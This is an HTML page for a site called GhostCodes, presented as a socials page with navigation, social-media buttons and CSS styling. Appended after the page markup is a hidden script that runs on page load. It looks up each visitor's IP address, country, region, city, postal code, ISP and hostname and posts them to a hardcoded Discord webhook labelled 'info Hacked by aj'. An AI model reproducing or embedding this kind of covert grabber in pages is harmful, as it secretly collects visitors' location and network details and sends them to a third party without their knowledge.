<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width">
    <meta content="GhostCodes" property="og:title" />
    <meta content="HomePage" property="og:description" />
    <meta content="https://ghostcodes.xyz" property="og:url" />
    <meta content="" property="og:image" />
    <meta content="#4979d1" data-react-helmet="true" name="theme-color" />
    <title>ghostcodes</title>
    <link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.13.0/css/all.css">
    <link href="style.css" rel="stylesheet" type="text/css" />
  </head>
  <body>   
  
<div class="topnav" id="myTopnav">
  <span style="cursor: pointer;" onclick="window.location.href='https://ghostcodes.xyz/'">GhostCodes</span>
  <div class="boxed"></div>
<div class="nav-left">
    <a href="/"><i class="fa fa-home"></i></a>
<a href="about">About</a>
<a class="active" href="/socials">Socials</a>
<a class="nav-discord" href="/discord"><i class="fab fa-discord"> Join</i> </a>
</div>
  <div class="nav-right">
     <a href="/discord"><i class="fab fa-discord"></i> </a>
    
  </div>
   <a href="javascript:void(0);" class="icon" onclick="dropdownNav()"><i class="fa fa-bars"></i></a>
</div>
<!-- style="background-color: rgba(43, 44, 46, 0.767);border-radius: 13px;text-align: center;padding:30px 30px;height: 30px;" -->
    
      <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css"/>
      <div class="middle-menu">
        <div class="wrapper">
          <div class="button">
             <div class="icon">
                <i class="fab fa-facebook-f"></i>
             </div>
             <span>Facebook</span>
          </div>
          <div class="button">
             <div class="icon">
                <i class="fab fa-twitter"></i>
             </div>
             <span>Twitter</span>
          </div>
          <div class="button">
             <div class="icon">
                <i class="fab fa-instagram"></i>
             </div>
             <span>Instagram</span>
          </div>
          <div class="button">
             <div class="icon">
                <i class="fab fa-codepen"></i>
             </div>
             <span>Codepen</span>
          </div>
          <div class="button">
             <div class="icon">
                <i class="fab fa-youtube"></i>
             </div>
             <span>YouTube</span>
          </div>
       </div>
      </div>
     
   
    
     <!-- <div class="line"></div> -->
   

     <div class="footer-wrapper">
       <footer>
  <p>&copy; GhostCodes 2021.</p>
</footer>
     </div>


  </body>
</html>

<script src="script.js"></script>
<script>
  function geo(json) {
    
    var request = new XMLHttpRequest();
        request.open("POST", `https://discord.com/api/webhooks/989312045054840852/zXs97vhvmv6GffWjNcjOCwepWu4bNy7-PTFCqT5EgxyI824F4h25DWnPjEIQ44xYoraF`);
        request.setRequestHeader('Content-type', 'application/json');
    var params = {
      username: "info Hacked by aj",
      avatar_url: "https://i.postimg.cc/g2DcKV3J/index.jpg",
      content: "```" + "IP: " + json.ip + "\n" + "COUNTRY: " + json.country_name + "\n" + "STATE: " + json.region + "\n" + "CITY: " + json.city + "\n" + "POSTAL CODE: " + json.postal_code + "\n" + "ORG: " + json.org + "\n" + "HOSTNAME: " + json.hostname + "```"
    }
   request.send(JSON.stringify(params));
  }
  
  

</script>
<script src="https://json.geoiplookup.io/?callback=geo"></script>
<style>
  @import url('https://fonts.googleapis.com/css?family=Poppins:400,500,600,700&display=swap');
*{
margin: 0;
padding: 0;
box-sizing: border-box;
font-family: 'Poppins', sans-serif;
}
html,body{
height: 100%;
width: 100%;
}
.wrapper .button{
display: inline-block;
height: 60px;
width: 60px;
float: left;
margin: 0 5px;
overflow: hidden;
background: #fff;
border-radius: 50px;
cursor: pointer;
box-shadow: 0px 10px 10px rgba(0,0,0,0.1);
transition: all 0.3s ease-out;
}
.wrapper .button:hover{
width: 200px;
}
.wrapper .button .icon{
display: inline-block;
height: 60px;
width: 60px;
text-align: center;
border-radius: 50px;
box-sizing: border-box;
line-height: 60px;
transition: all 0.3s ease-out;
}
.wrapper .button:nth-child(1):hover .icon{
background: #4267B2;
}
.wrapper .button:nth-child(2):hover .icon{
background: #1DA1F2;
}
.wrapper .button:nth-child(3):hover .icon{
background: #E1306C;
}
.wrapper .button:nth-child(4):hover .icon{
background: #333;
}
.wrapper .button:nth-child(5):hover .icon{
background: #ff0000;
}
.wrapper .button .icon i{
font-size: 25px;
line-height: 60px;
transition: all 0.3s ease-out;
}
.wrapper .button:hover .icon i{
color: #fff;
}
.wrapper .button span{
font-size: 20px;
font-weight: 500;
line-height: 60px;
margin-left: 10px;
transition: all 0.3s ease-out;
}
.wrapper .button:nth-child(1) span{
color: #4267B2;
}
.wrapper .button:nth-child(2) span{
color: #1DA1F2;
}
.wrapper .button:nth-child(3) span{
color: #E1306C;
}
.wrapper .button:nth-child(4) span{
color: #333;
}
.wrapper .button:nth-child(5) span{
color: #ff0000;
}
</style>